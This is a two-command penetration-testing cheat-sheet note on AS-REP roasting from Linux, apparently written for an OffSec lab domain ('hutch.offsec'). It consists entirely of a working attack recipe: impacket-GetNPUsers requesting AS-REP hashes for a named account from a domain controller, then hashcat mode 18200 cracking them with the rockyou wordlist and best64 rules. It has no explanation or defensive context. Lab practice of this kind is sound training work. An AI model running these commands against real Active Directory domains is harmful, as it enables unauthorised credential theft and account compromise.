ASPRoasting

Linux Side

impacket-GetNPUsers -dc-ip $ip  -request -outputfile hashes.asreproast hutch.offsec/fmcsorley
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force